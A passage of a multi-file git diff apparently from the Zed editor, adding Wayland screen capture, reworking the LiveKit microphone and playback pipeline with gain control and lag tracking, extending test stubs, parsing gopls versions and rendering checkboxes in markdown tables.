+ CaptureError, DesktopCaptureSourceType, DesktopCapturer, DesktopCapturerOptions,
+ DesktopFrame,
+ };
+ use libwebrtc::native::yuv_helper::argb_to_nv12;
+ use std::time::Duration;
+ use webrtc_sys::webrtc::ffi as webrtc_ffi;
+
+ fn webrtc_log_callback(message: String, severity: webrtc_ffi::LoggingSeverity) {
+ match severity {
+ webrtc_ffi::LoggingSeverity::Error => log::error!("[webrtc] {}", message.trim()),
+ _ => log::debug!("[webrtc] {}", message.trim()),
+ }
+ }
+
+ let _webrtc_log_sink = webrtc_ffi::new_log_sink(webrtc_log_callback);
+ log::debug!("Wayland desktop capture: WebRTC internal logging enabled");
+
+ let stop_flag = Arc::new(AtomicBool::new(false));
+ let (mut video_source_tx, mut video_source_rx) = mpsc::channel::<NativeVideoSource>(1);
+ let (failure_tx, failure_rx) = oneshot::channel::<()>();
+
+ let mut options = DesktopCapturerOptions::new(DesktopCaptureSourceType::Generic);
+ options.set_include_cursor(true);
+ let mut capturer = DesktopCapturer::new(options).ok_or_else(|| {
+ anyhow::anyhow!(
+ "Failed to create desktop capturer. \
+ Check that xdg-desktop-portal is installed and running."
+ )
+ })?;
+
+ let permanent_error = Arc::new(AtomicBool::new(false));
+ let stop_cb = stop_flag.clone();
+ let permanent_error_cb = permanent_error.clone();
+ capturer.start_capture(None, {
+ let mut video_source: Option<NativeVideoSource> = None;
+ let mut current_width: u32 = 0;
+ let mut current_height: u32 = 0;
+ let mut video_frame = VideoFrame {
+ rotation: VideoRotation::VideoRotation0,
+ buffer: NV12Buffer::new(1, 1),
+ timestamp_us: 0,
+ };
+
+ move |result: Result<DesktopFrame, CaptureError>| {
+ let frame = match result {
+ Ok(frame) => frame,
+ Err(CaptureError::Temporary) => return,
+ Err(CaptureError::Permanent) => {
+ log::error!("Wayland desktop capture encountered a permanent error");
+ permanent_error_cb.store(true, Ordering::Release);
+ stop_cb.store(true, Ordering::Release);
+ return;
+ }
+ };
+
+ let width = frame.width() as u32;
+ let height = frame.height() as u32;
+ if width != current_width || height != current_height {
+ current_width = width;
+ current_height = height;
+ video_frame.buffer = NV12Buffer::new(width, height);
+ }
+
+ let (stride_y, stride_uv) = video_frame.buffer.strides();
+ let (data_y, data_uv) = video_frame.buffer.data_mut();
+ argb_to_nv12(
+ frame.data(),
+ frame.stride(),
+ data_y,
+ stride_y,
+ data_uv,
+ stride_uv,
+ width as i32,
+ height as i32,
+ );
+
+ if let Some(source) = &video_source {
+ source.capture_frame(&video_frame);
+ } else {
+ let source = NativeVideoSource::new(VideoResolution { width, height }, true);
+ source.capture_frame(&video_frame);
+ video_source_tx.try_send(source.clone()).ok();
+ video_source = Some(source);
+ }
+ }
+ });
+
+ log::info!("Wayland desktop capture: starting capture loop");
+
+ let stop = stop_flag.clone();
+ let tokio_task = gpui_tokio::Tokio::spawn(cx, async move {
+ loop {
+ if stop.load(Ordering::Acquire) {
+ break;
+ }
+ capturer.capture_frame();
+ tokio::time::sleep(Duration::from_millis(33)).await;
+ }
+ drop(capturer);
+
+ if permanent_error.load(Ordering::Acquire) {
+ log::error!("Wayland screen capture ended due to a permanent capture error");
+ let _ = failure_tx.send(());
+ }
+ });
+
+ let capture_task = cx.background_executor().spawn(async move {
+ if let Err(error) = tokio_task.await {
+ log::error!("Wayland capture task failed: {error}");
+ }
+ });
+
+ let executor = cx.background_executor().clone();
+ let video_source = video_source_rx
+ .next()
+ .with_timeout(Duration::from_secs(PIPEWIRE_TIMEOUT_S), &executor)
+ .await
+ .map_err(|_| {
+ stop_flag.store(true, Ordering::Relaxed);
+ log::error!("Wayland desktop capture timed out.");
+ anyhow::anyhow!(
+ "Screen sharing timed out waiting for the first frame. \
+ Check that xdg-desktop-portal and PipeWire are running, \
+ and that your portal backend matches your compositor."
+ )
+ })?
+ .ok_or_else(|| {
+ stop_flag.store(true, Ordering::Relaxed);
+ anyhow::anyhow!(
+ "Screen sharing was canceled or the portal denied permission. \
+ You can try again from the screen share button."
+ )
+ })?;
+
+ let track = super::LocalVideoTrack(track::LocalVideoTrack::create_video_track(
+ "screen share",
+ RtcVideoSource::Native(video_source),
+ ));
+
+ Ok((track, stop_flag, capture_task, failure_rx))
+}
@@ -1,9 +1,9 @@
use anyhow::{Context as _, Result};
-use audio::{AudioSettings, CHANNEL_COUNT, LEGACY_CHANNEL_COUNT, LEGACY_SAMPLE_RATE, SAMPLE_RATE};
+use audio::{AudioSettings, CHANNEL_COUNT, SAMPLE_RATE};
use cpal::DeviceId;
use cpal::traits::{DeviceTrait, StreamTrait as _};
-use futures::channel::mpsc::UnboundedSender;
+use futures::channel::mpsc::Sender;
use futures::{Stream, StreamExt as _};
use gpui::{
AsyncApp, BackgroundExecutor, Priority, ScreenCaptureFrame, ScreenCaptureSource,
@@ -23,16 +23,21 @@ use livekit::webrtc::{
use log::info;
use parking_lot::Mutex;
use rodio::Source;
+use rodio::conversions::SampleTypeConverter;
+use rodio::source::{AutomaticGainControlSettings, LimitSettings};
use serde::{Deserialize, Serialize};
use settings::Settings;
use std::cell::RefCell;
use std::sync::Weak;
-use std::sync::atomic::{AtomicBool, AtomicI32, Ordering};
-use std::time::Duration;
-use std::{borrow::Cow, collections::VecDeque, sync::Arc, thread};
+use std::sync::atomic::{AtomicI32, AtomicU64, Ordering};
+use std::time::{Duration, Instant};
+use std::{borrow::Cow, collections::VecDeque, sync::Arc};
use util::{ResultExt as _, maybe};
-mod source;
+struct TimestampedFrame {
+ frame: AudioFrame<'static>,
+ captured_at: Instant,
+}
pub(crate) struct AudioStack {
executor: BackgroundExecutor,
@@ -42,38 +47,6 @@ pub(crate) struct AudioStack {
next_ssrc: AtomicI32,
}
-pub(crate) fn play_remote_audio_track(
- track: &livekit::track::RemoteAudioTrack,
- speaker: Speaker,
- cx: &mut gpui::App,
-) -> Result<AudioStream> {
- info!("speaker: {speaker:?}");
- let stream =
- source::LiveKitStream::new(cx.background_executor(), track, speaker.sends_legacy_audio);
-
- let stop_handle = Arc::new(AtomicBool::new(false));
- let stop_handle_clone = stop_handle.clone();
- let stream = stream
- .stoppable()
- .periodic_access(Duration::from_millis(50), move |s| {
- if stop_handle.load(Ordering::Relaxed) {
- s.stop();
- }
- });
-
- info!("sample_rate: {:?}", stream.sample_rate());
- info!("channel_count: {:?}", stream.channels());
- audio::Audio::play_voip_stream(stream, speaker.name, speaker.is_staff, cx)
- .context("Could not play audio")?;
-
- let on_drop = util::defer(move || {
- stop_handle_clone.store(true, Ordering::Relaxed);
- });
- Ok(AudioStream::Output {
- _drop: Box::new(on_drop),
- })
-}
-
impl AudioStack {
pub(crate) fn new(executor: BackgroundExecutor) -> Self {
let apm = Arc::new(Mutex::new(apm::AudioProcessingModule::new(
@@ -99,8 +72,8 @@ impl AudioStack {
let next_ssrc = self.next_ssrc.fetch_add(1, Ordering::Relaxed);
let source = AudioMixerSource {
ssrc: next_ssrc,
- sample_rate: LEGACY_SAMPLE_RATE.get(),
- num_channels: LEGACY_CHANNEL_COUNT.get() as u32,
+ sample_rate: SAMPLE_RATE.get(),
+ num_channels: CHANNEL_COUNT.get() as u32,
buffer: Arc::default(),
};
self.mixer.lock().add_source(source.clone());
@@ -111,7 +84,7 @@ impl AudioStack {
source.num_channels as i32,
);
- let receive_task = self.executor.spawn({
+ let receive_task = self.executor.spawn_with_priority(Priority::RealtimeAudio, {
let source = source.clone();
async move {
while let Some(frame) = stream.next().await {
@@ -139,12 +112,14 @@ impl AudioStack {
let task = Arc::new(self.executor.spawn({
let apm = self.apm.clone();
let mixer = self.mixer.clone();
+ let executor = self.executor.clone();
async move {
Self::play_output(
+ executor,
apm,
mixer,
- LEGACY_SAMPLE_RATE.get(),
- LEGACY_CHANNEL_COUNT.get().into(),
+ SAMPLE_RATE.get(),
+ CHANNEL_COUNT.get().into(),
output_audio_device,
)
.await
@@ -160,33 +135,18 @@ impl AudioStack {
user_name: String,
is_staff: bool,
cx: &AsyncApp,
- ) -> Result<(crate::LocalAudioTrack, AudioStream)> {
- let legacy_audio_compatible =
- AudioSettings::try_read_global(cx, |setting| setting.legacy_audio_compatible)
- .unwrap_or(true);
-
- let source = if legacy_audio_compatible {
- NativeAudioSource::new(
- // n.b. this struct's options are always ignored, noise cancellation is provided by apm.
- AudioSourceOptions::default(),
- LEGACY_SAMPLE_RATE.get(),
- LEGACY_CHANNEL_COUNT.get().into(),
- 10,
- )
- } else {
- NativeAudioSource::new(
- // n.b. this struct's options are always ignored, noise cancellation is provided by apm.
- AudioSourceOptions::default(),
- SAMPLE_RATE.get(),
- CHANNEL_COUNT.get().into(),
- 10,
- )
- };
+ ) -> Result<(crate::LocalAudioTrack, AudioStream, Arc<AtomicU64>)> {
+ let source = NativeAudioSource::new(
+ // n.b. this struct's options are always ignored, noise cancellation is provided by apm.
+ AudioSourceOptions::default(),
+ SAMPLE_RATE.get(),
+ CHANNEL_COUNT.get().into(),
+ 10,
+ );
let speaker = Speaker {
name: user_name,
is_staff,
- sends_legacy_audio: legacy_audio_compatible,
};
log::info!("Microphone speaker: {speaker:?}");
let track_name = serde_urlencoded::to_string(speaker)
@@ -199,38 +159,30 @@ impl AudioStack {
let apm = self.apm.clone();
- let (frame_tx, mut frame_rx) = futures::channel::mpsc::unbounded();
- let transmit_task = self.executor.spawn({
+ let input_lag_us = Arc::new(AtomicU64::new(0));
+ let (frame_tx, mut frame_rx) = futures::channel::mpsc::channel::<TimestampedFrame>(1);
+ let transmit_task = self.executor.spawn_with_priority(Priority::RealtimeAudio, {
+ let input_lag_us = input_lag_us.clone();
async move {
- while let Some(frame) = frame_rx.next().await {
- source.capture_frame(&frame).await.log_err();
+ while let Some(timestamped) = frame_rx.next().await {
+ let lag = timestamped.captured_at.elapsed();
+ input_lag_us.store(lag.as_micros() as u64, Ordering::Relaxed);
+ source.capture_frame(×tamped.frame).await.log_err();
}
}
});
- let rodio_pipeline =
- AudioSettings::try_read_global(cx, |setting| setting.rodio_audio).unwrap_or_default();
- let capture_task = if rodio_pipeline {
- info!("Using experimental.rodio_audio audio pipeline");
- let voip_parts = audio::VoipParts::new(cx)?;
- // Audio needs to run real-time and should never be paused. That is
- // why we are using a normal std::thread and not a background task
- self.executor
- .spawn_with_priority(Priority::RealtimeAudio, async move {
- // microphone is non send on mac
- let microphone = audio::Audio::open_microphone(voip_parts)?;
- send_to_livekit(frame_tx, microphone);
- Ok(())
- })
- } else {
+ let capture_task = {
let input_audio_device =
AudioSettings::try_read_global(cx, |settings| settings.input_audio_device.clone())
.flatten();
+ let executor = self.executor.clone();
self.executor.spawn(async move {
Self::capture_input(
+ executor,
apm,
frame_tx,
- LEGACY_SAMPLE_RATE.get(),
- LEGACY_CHANNEL_COUNT.get().into(),
+                    SAMPLE_RATE.get(), // TODO(audio): legacy sample-rate support was removed for now
+ CHANNEL_COUNT.get().into(),
input_audio_device,
)
.await
@@ -246,14 +198,16 @@ impl AudioStack {
AudioStream::Output {
_drop: Box::new(on_drop),
},
+ input_lag_us,
))
}
async fn play_output(
+ executor: BackgroundExecutor,
apm: Arc<Mutex<apm::AudioProcessingModule>>,
mixer: Arc<Mutex<audio_mixer::AudioMixer>>,
sample_rate: u32,
- num_channels: u32,
+ _num_channels: u32,
output_audio_device: Option<DeviceId>,
) -> Result<()> {
// Prevent App Nap from throttling audio playback on macOS.
@@ -265,15 +219,15 @@ impl AudioStack {
let mut device_change_listener = DeviceChangeListener::new(false)?;
let (output_device, output_config) =
crate::default_device(false, output_audio_device.as_ref())?;
+ info!("Output config: {output_config:?}");
let (end_on_drop_tx, end_on_drop_rx) = std::sync::mpsc::channel::<()>();
let mixer = mixer.clone();
let apm = apm.clone();
let mut resampler = audio_resampler::AudioResampler::default();
let mut buf = Vec::new();
- thread::Builder::new()
- .name("AudioPlayback".to_owned())
- .spawn(move || {
+ executor
+ .spawn_with_priority(Priority::RealtimeAudio, async move {
let output_stream = output_device.build_output_stream(
&output_config.config(),
{
@@ -296,7 +250,12 @@ impl AudioStack {
let sampled = resampler.remix_and_resample(
mixed,
sample_rate / 100,
- num_channels,
+                                // We need to use the output channel count here, as otherwise we
+                                // crash in process_reverse_stream: livekit's audio resampler
+                                // does not seem to support non-matching channel counts.
+                                // NOTE: you can verify this by debug printing buf.len() after this stage.
+                                // For a 2->4 channel upmix we should see buf.len()=1920, but we get only 960.
+ output_config.channels() as u32,
sample_rate,
output_config.channels() as u32,
output_config.sample_rate(),
@@ -324,7 +283,7 @@ impl AudioStack {
// Block forever to keep the output stream alive
end_on_drop_rx.recv().ok();
})
- .unwrap();
+ .detach();
device_change_listener.next().await;
drop(end_on_drop_tx)
@@ -332,8 +291,9 @@ impl AudioStack {
}
async fn capture_input(
+ executor: BackgroundExecutor,
apm: Arc<Mutex<apm::AudioProcessingModule>>,
- frame_tx: UnboundedSender<AudioFrame<'static>>,
+ frame_tx: Sender<TimestampedFrame>,
sample_rate: u32,
num_channels: u32,
input_audio_device: Option<DeviceId>,
@@ -343,12 +303,11 @@ impl AudioStack {
let (device, config) = crate::default_device(true, input_audio_device.as_ref())?;
let (end_on_drop_tx, end_on_drop_rx) = std::sync::mpsc::channel::<()>();
let apm = apm.clone();
- let frame_tx = frame_tx.clone();
+ let mut frame_tx = frame_tx.clone();
let mut resampler = audio_resampler::AudioResampler::default();
- thread::Builder::new()
- .name("AudioCapture".to_owned())
- .spawn(move || {
+ executor
+ .spawn_with_priority(Priority::RealtimeAudio, async move {
maybe!({
if let Some(desc) = device.description().ok() {
log::info!("Using microphone: {}", desc.name())
@@ -359,12 +318,21 @@ impl AudioStack {
let ten_ms_buffer_size =
(config.channels() as u32 * config.sample_rate() / 100) as usize;
let mut buf: Vec<i16> = Vec::with_capacity(ten_ms_buffer_size);
+ let mut rodio_effects = RodioEffectsAdaptor::new(buf.len())
+ .automatic_gain_control(AutomaticGainControlSettings {
+ target_level: 0.50,
+ attack_time: Duration::from_secs(1),
+ release_time: Duration::from_secs(0),
+ absolute_max_gain: 5.0,
+ })
+ .limit(LimitSettings::live_performance());
let stream = device
.build_input_stream_raw(
&config.config(),
config.sample_format(),
move |data, _: &_| {
+ let captured_at = Instant::now();
let data = crate::get_sample_data(config.sample_format(), data)
.log_err();
let Some(data) = data else {
@@ -389,6 +357,21 @@ impl AudioStack {
sample_rate,
)
.to_owned();
+
+ if audio::LIVE_SETTINGS
+ .auto_microphone_volume
+ .load(Ordering::Relaxed)
+ {
+ rodio_effects
+ .inner_mut()
+ .inner_mut()
+ .fill_buffer_with(&sampled);
+ sampled.clear();
+ sampled.extend(SampleTypeConverter::<_, i16>::new(
+ rodio_effects.by_ref(),
+ ));
+ }
+
apm.lock()
.process_stream(
&mut sampled,
@@ -397,12 +380,16 @@ impl AudioStack {
)
.log_err();
buf.clear();
+
frame_tx
- .unbounded_send(AudioFrame {
- data: Cow::Owned(sampled),
- sample_rate,
- num_channels,
- samples_per_channel: sample_rate / 100,
+ .try_send(TimestampedFrame {
+ frame: AudioFrame {
+ data: Cow::Owned(sampled),
+ sample_rate,
+ num_channels,
+ samples_per_channel: sample_rate / 100,
+ },
+ captured_at,
})
.ok();
}
@@ -420,7 +407,7 @@ impl AudioStack {
})
.log_err();
})
- .unwrap();
+ .detach();
device_change_listener.next().await;
drop(end_on_drop_tx)
@@ -428,39 +415,73 @@ impl AudioStack {
}
}
-#[derive(Serialize, Deserialize, Debug)]
-pub struct Speaker {
- pub name: String,
- pub is_staff: bool,
- pub sends_legacy_audio: bool,
+/// This allows the use of Rodio's effects library within our home-brewed audio
+/// pipeline. The alternative would be inlining Rodio's effects, which is
+/// problematic from a legal stance: we would then have to make clear that the
+/// code is not owned by zed-industries while it is surrounded by
+/// zed-industries-owned code.
+///
+/// This adaptor does incur a slight performance penalty (copying into a
+/// pre-allocated vec and back) however the impact will be immeasurably low.
+///
+/// There is no latency impact.
+pub struct RodioEffectsAdaptor {
+ input: Vec<rodio::Sample>,
+ pos: usize,
}
-fn send_to_livekit(frame_tx: UnboundedSender<AudioFrame<'static>>, mut microphone: impl Source) {
- use cpal::Sample;
- let sample_rate = microphone.sample_rate().get();
- let num_channels = microphone.channels().get() as u32;
- let buffer_size = sample_rate / 100 * num_channels;
-
- loop {
- let sampled: Vec<_> = microphone
- .by_ref()
- .take(buffer_size as usize)
- .map(|s| s.to_sample())
- .collect();
-
- if frame_tx
- .unbounded_send(AudioFrame {
- sample_rate,
- num_channels,
- samples_per_channel: sampled.len() as u32 / num_channels,
- data: Cow::Owned(sampled),
- })
- .is_err()
- {
- // must rx has dropped or is not consuming
- break;
+impl RodioEffectsAdaptor {
+    // NOTE: this uses confusing, nonstandard terminology. A normal
+    // audio frame consists of all samples for one moment in time (one for mono,
+    // two for stereo). Here a "frame" of audio refers to a 10ms buffer of samples.
+ fn new(samples_per_frame: usize) -> Self {
+ Self {
+ input: Vec::with_capacity(samples_per_frame),
+ pos: 0,
}
}
+
+ fn fill_buffer_with(&mut self, integer_samples: &[i16]) {
+ self.input.clear();
+ self.input.extend(SampleTypeConverter::<_, f32>::new(
+ integer_samples.iter().copied(),
+ ));
+ self.pos = 0;
+ }
+}
+
+impl Iterator for RodioEffectsAdaptor {
+ type Item = rodio::Sample;
+
+ fn next(&mut self) -> Option<Self::Item> {
+ let sample = self.input.get(self.pos)?;
+ self.pos += 1;
+ Some(*sample)
+ }
+}
+
+impl rodio::Source for RodioEffectsAdaptor {
+ fn current_span_len(&self) -> Option<usize> {
+ None
+ }
+
+ fn channels(&self) -> rodio::ChannelCount {
+ rodio::nz!(2)
+ }
+
+ fn sample_rate(&self) -> rodio::SampleRate {
+ rodio::nz!(48000)
+ }
+
+ fn total_duration(&self) -> Option<Duration> {
+ None
+ }
+}
+
+#[derive(Serialize, Deserialize, Debug)]
+pub struct Speaker {
+ pub name: String,
+ pub is_staff: bool,
}
use super::LocalVideoTrack;
@@ -1,92 +0,0 @@
-use std::num::NonZero;
-
-use futures::StreamExt;
-use libwebrtc::{audio_stream::native::NativeAudioStream, prelude::AudioFrame};
-use livekit::track::RemoteAudioTrack;
-use rodio::{
- ChannelCount, SampleRate, Source, buffer::SamplesBuffer, conversions::SampleTypeConverter,
-};
-
-use audio::{CHANNEL_COUNT, LEGACY_CHANNEL_COUNT, LEGACY_SAMPLE_RATE, SAMPLE_RATE};
-
-fn frame_to_samplesbuffer(frame: AudioFrame) -> SamplesBuffer {
- let samples = frame.data.iter().copied();
- let samples = SampleTypeConverter::<_, _>::new(samples);
- let samples: Vec<f32> = samples.collect();
- SamplesBuffer::new(
- NonZero::new(frame.num_channels as u16).expect("zero channels is nonsense"),
- NonZero::new(frame.sample_rate).expect("samplerate zero is nonsense"),
- samples,
- )
-}
-
-pub struct LiveKitStream {
- // shared_buffer: SharedBuffer,
- inner: rodio::queue::SourcesQueueOutput,
- _receiver_task: gpui::Task<()>,
- channel_count: ChannelCount,
- sample_rate: SampleRate,
-}
-
-impl LiveKitStream {
- pub fn new(
- executor: &gpui::BackgroundExecutor,
- track: &RemoteAudioTrack,
- legacy: bool,
- ) -> Self {
- let (channel_count, sample_rate) = if legacy {
- (LEGACY_CHANNEL_COUNT, LEGACY_SAMPLE_RATE)
- } else {
- (CHANNEL_COUNT, SAMPLE_RATE)
- };
-
- let mut stream = NativeAudioStream::new(
- track.rtc_track(),
- sample_rate.get() as i32,
- channel_count.get().into(),
- );
- let (queue_input, queue_output) = rodio::queue::queue(true);
- // spawn rtc stream
- let receiver_task = executor.spawn_with_priority(gpui::Priority::RealtimeAudio, {
- async move {
- while let Some(frame) = stream.next().await {
- let samples = frame_to_samplesbuffer(frame);
- queue_input.append(samples);
- }
- }
- });
-
- LiveKitStream {
- _receiver_task: receiver_task,
- inner: queue_output,
- sample_rate,
- channel_count,
- }
- }
-}
-
-impl Iterator for LiveKitStream {
- type Item = rodio::Sample;
-
- fn next(&mut self) -> Option<Self::Item> {
- self.inner.next()
- }
-}
-
-impl Source for LiveKitStream {
- fn current_span_len(&self) -> Option<usize> {
- self.inner.current_span_len()
- }
-
- fn channels(&self) -> rodio::ChannelCount {
- self.channel_count
- }
-
- fn sample_rate(&self) -> rodio::SampleRate {
- self.sample_rate
- }
-
- fn total_duration(&self) -> Option<std::time::Duration> {
- self.inner.total_duration()
- }
-}
@@ -15,7 +15,7 @@ pub type LocalTrackPublication = publication::LocalTrackPublication;
pub type LocalParticipant = participant::LocalParticipant;
pub type Room = test::Room;
-pub use test::{ConnectionState, ParticipantIdentity, TrackSid};
+pub use test::{ConnectionState, ParticipantIdentity, RtcStats, SessionStats, TrackSid};
pub struct AudioStream {}
@@ -1,6 +1,6 @@
use crate::{
- AudioStream, LocalAudioTrack, LocalTrackPublication, LocalVideoTrack, Participant,
- ParticipantIdentity, RemoteTrack, RemoteTrackPublication, TrackSid,
+ AudioStream, ConnectionQuality, LocalAudioTrack, LocalTrackPublication, LocalVideoTrack,
+ Participant, ParticipantIdentity, RemoteTrack, RemoteTrackPublication, TrackSid,
test::{Room, WeakRoom},
};
use anyhow::Result;
@@ -8,6 +8,7 @@ use collections::HashMap;
use gpui::{
AsyncApp, DevicePixels, ScreenCaptureSource, ScreenCaptureStream, SourceMetadata, size,
};
+use std::sync::{Arc, atomic::AtomicU64};
#[derive(Clone, Debug)]
pub struct LocalParticipant {
@@ -28,9 +29,31 @@ impl Participant {
Participant::Remote(participant) => participant.identity.clone(),
}
}
+
+ pub fn connection_quality(&self) -> ConnectionQuality {
+ match self {
+ Participant::Local(p) => p.connection_quality(),
+ Participant::Remote(p) => p.connection_quality(),
+ }
+ }
+
+ pub fn audio_level(&self) -> f32 {
+ match self {
+ Participant::Local(p) => p.audio_level(),
+ Participant::Remote(p) => p.audio_level(),
+ }
+ }
}
impl LocalParticipant {
+ pub fn connection_quality(&self) -> ConnectionQuality {
+ ConnectionQuality::Excellent
+ }
+
+ pub fn audio_level(&self) -> f32 {
+ 0.0
+ }
+
pub async fn unpublish_track(&self, track: TrackSid, _cx: &AsyncApp) -> Result<()> {
self.room
.test_server()
@@ -41,7 +64,7 @@ impl LocalParticipant {
pub(crate) async fn publish_microphone_track(
&self,
_cx: &AsyncApp,
- ) -> Result<(LocalTrackPublication, AudioStream)> {
+ ) -> Result<(LocalTrackPublication, AudioStream, Arc<AtomicU64>)> {
let this = self.clone();
let server = this.room.test_server();
let sid = server
@@ -54,6 +77,7 @@ impl LocalParticipant {
sid,
},
AudioStream {},
+ Arc::new(AtomicU64::new(0)),
))
}
@@ -75,9 +99,42 @@ impl LocalParticipant {
Box::new(TestScreenCaptureStream {}),
))
}
+
+ #[cfg(target_os = "linux")]
+ pub async fn publish_screenshare_track_wayland(
+ &self,
+ _cx: &mut AsyncApp,
+ ) -> Result<(
+ LocalTrackPublication,
+ Box<dyn ScreenCaptureStream>,
+ futures::channel::oneshot::Receiver<()>,
+ )> {
+ let (_failure_tx, failure_rx) = futures::channel::oneshot::channel();
+ let this = self.clone();
+ let server = this.room.test_server();
+ let sid = server
+ .publish_video_track(this.room.token(), LocalVideoTrack {})
+ .await?;
+ Ok((
+ LocalTrackPublication {
+ room: self.room.downgrade(),
+ sid,
+ },
+ Box::new(TestWaylandScreenCaptureStream::new()),
+ failure_rx,
+ ))
+ }
}
impl RemoteParticipant {
+ pub fn connection_quality(&self) -> ConnectionQuality {
+ ConnectionQuality::Excellent
+ }
+
+ pub fn audio_level(&self) -> f32 {
+ 0.0
+ }
+
pub fn track_publications(&self) -> HashMap<TrackSid, RemoteTrackPublication> {
if let Some(room) = self.room.upgrade() {
let server = room.test_server();
@@ -134,3 +191,32 @@ impl ScreenCaptureStream for TestScreenCaptureStream {
})
}
}
+
+#[cfg(target_os = "linux")]
+static NEXT_TEST_WAYLAND_SHARE_ID: AtomicU64 = AtomicU64::new(1);
+
+#[cfg(target_os = "linux")]
+struct TestWaylandScreenCaptureStream {
+ id: u64,
+}
+
+#[cfg(target_os = "linux")]
+impl TestWaylandScreenCaptureStream {
+ fn new() -> Self {
+ Self {
+ id: NEXT_TEST_WAYLAND_SHARE_ID.fetch_add(1, std::sync::atomic::Ordering::Relaxed),
+ }
+ }
+}
+
+#[cfg(target_os = "linux")]
+impl ScreenCaptureStream for TestWaylandScreenCaptureStream {
+ fn metadata(&self) -> Result<SourceMetadata> {
+ Ok(SourceMetadata {
+ id: self.id,
+ is_main: None,
+ label: None,
+ resolution: size(DevicePixels(1), DevicePixels(1)),
+ })
+ }
+}
@@ -10,7 +10,7 @@ use parking_lot::Mutex;
use postage::{mpsc, sink::Sink};
use std::sync::{
Arc, Weak,
- atomic::{AtomicBool, Ordering::SeqCst},
+ atomic::{AtomicBool, AtomicU64, Ordering::SeqCst},
};
#[derive(Clone, Debug, Eq, Hash, PartialEq, PartialOrd, Ord)]
@@ -40,6 +40,15 @@ pub enum ConnectionState {
Disconnected,
}
+#[derive(Clone, Debug, Default)]
+pub struct SessionStats {
+ pub publisher_stats: Vec<RtcStats>,
+ pub subscriber_stats: Vec<RtcStats>,
+}
+
+#[derive(Clone, Debug)]
+pub enum RtcStats {}
+
static SERVERS: Mutex<BTreeMap<String, Arc<TestServer>>> = Mutex::new(BTreeMap::new());
pub struct TestServer {
@@ -739,9 +748,17 @@ impl Room {
_track_name: String,
_is_staff: bool,
cx: &mut AsyncApp,
- ) -> Result<(LocalTrackPublication, AudioStream)> {
+ ) -> Result<(LocalTrackPublication, AudioStream, Arc<AtomicU64>)> {
self.local_participant().publish_microphone_track(cx).await
}
+
+ pub async fn get_stats(&self) -> Result<SessionStats> {
+ Ok(SessionStats::default())
+ }
+
+ pub fn stats_task(&self, _cx: &impl gpui::AppContext) -> gpui::Task<Result<SessionStats>> {
+ gpui::Task::ready(Ok(SessionStats::default()))
+ }
}
impl Drop for RoomState {
@@ -1306,6 +1306,29 @@ impl LanguageServer {
self.version.clone()
}
+ /// Get the readable version of the running language server.
+ pub fn readable_version(&self) -> Option<SharedString> {
+ match self.name().as_ref() {
+ "gopls" => {
+ // Gopls returns a detailed JSON object as its version string; we must parse it to extract the semantic version.
+ // Example: `{"GoVersion":"go1.26.0","Path":"golang.org/x/tools/gopls","Main":{},"Deps":[],"Settings":[],"Version":"v0.21.1"}`
+ self.version
+ .as_ref()
+ .and_then(|obj| {
+ #[derive(Deserialize)]
+ struct GoplsVersion<'a> {
+ #[serde(rename = "Version")]
+ version: &'a str,
+ }
+ let parsed: GoplsVersion = serde_json::from_str(obj.as_str()).ok()?;
+ Some(parsed.version.trim_start_matches("v").to_owned().into())
+ })
+ .or_else(|| self.version.clone())
+ }
+ _ => self.version.clone(),
+ }
+ }
+
/// Get the process name of the running language server.
pub fn process_name(&self) -> &str {
&self.process_name
@@ -1271,18 +1271,23 @@ impl Element for MarkdownElement {
builder.table.start(alignments.clone());
let column_count = alignments.len();
+ builder.push_div(
+ div().flex().flex_col().items_start(),
+ range,
+ markdown_end,
+ );
builder.push_div(
div()
.id(("table", range.start))
+ .min_w_0()
.grid()
.grid_cols(column_count as u16)
.when(self.style.table_columns_min_size, |this| {
this.grid_cols_min_content(column_count as u16)
})
.when(!self.style.table_columns_min_size, |this| {
- this.grid_cols(column_count as u16)
+ this.grid_cols_max_content(column_count as u16)
})
- .w_full()
.mb_2()
.border(px(1.5))
.border_color(cx.theme().colors().border)
@@ -1430,6 +1435,7 @@ impl Element for MarkdownElement {
}
}
MarkdownTagEnd::Table => {
+ builder.pop_div();
builder.pop_div();
builder.table.end();
}
@@ -1441,6 +1447,7 @@ impl Element for MarkdownElement {
builder.table.end_row();
}
MarkdownTagEnd::TableCell => {
+ builder.replace_pending_checkbox(range);
builder.pop_div();
builder.table.end_cell();
}
@@ -1926,6 +1933,28 @@ impl MarkdownElementBuilder {
}
}
+ /// If the pending table-cell text is exactly a markdown checkbox literal
+ /// ("[x]", "[X]", or "[ ]"), discards the text and pushes a rendered,
+ /// non-interactive `Checkbox` element into the current div instead.
+ fn replace_pending_checkbox(&mut self, source_range: &Range<usize>) {
+ let trimmed = self.pending_line.text.trim();
+ if trimmed == "[x]" || trimmed == "[X]" || trimmed == "[ ]" {
+ let checked = trimmed != "[ ]";
+ // Drop the literal text so it is not also rendered as plain text.
+ self.pending_line = PendingLine::default();
+ let checkbox = Checkbox::new(
+ // Source range makes the element id unique per cell.
+ ElementId::Name(
+ format!("table_checkbox_{}_{}", source_range.start, source_range.end).into(),
+ ),
+ if checked {
+ ToggleState::Selected
+ } else {
+ ToggleState::Unselected
+ },
+ )
+ .fill()
+ // Display-only: clicks do not toggle state.
+ .visualization_only(true)
+ .into_any_element();
+ // NOTE(review): assumes a parent div is always on the stack at TableCell end —
+ // confirm push/pop pairing in the surrounding element builder.
+ self.div_stack.last_mut().unwrap().extend([checkbox]);
+ }
+ }
+
fn flush_text(&mut self) {
let line = mem::take(&mut self.pending_line);
if line.text.is_empty() {
@@ -2493,6 +2522,48 @@ mod tests {
assert_eq!(second_word, "b");
}
+ // Verifies that table cells containing only "[x]"/"[X]"/"[ ]" are detectable
+ // from the parser's event stream — the same literals the element builder
+ // replaces with rendered checkboxes.
+ #[test]
+ fn test_table_checkbox_detection() {
+ let md = "| Done |\n|------|\n| [x] |\n| [ ] |";
+ let (events, _, _) = crate::parser::parse_markdown(md);
+
+ // Collect the text of each table cell by replaying the event stream.
+ let mut in_table = false;
+ let mut cell_texts: Vec<String> = Vec::new();
+ let mut current_cell = String::new();
+
+ for (range, event) in &events {
+ match event {
+ MarkdownEvent::Start(MarkdownTag::Table(_)) => in_table = true,
+ MarkdownEvent::End(MarkdownTagEnd::Table) => in_table = false,
+ MarkdownEvent::Start(MarkdownTag::TableCell) => current_cell.clear(),
+ MarkdownEvent::End(MarkdownTagEnd::TableCell) => {
+ if in_table {
+ cell_texts.push(current_cell.clone());
+ }
+ }
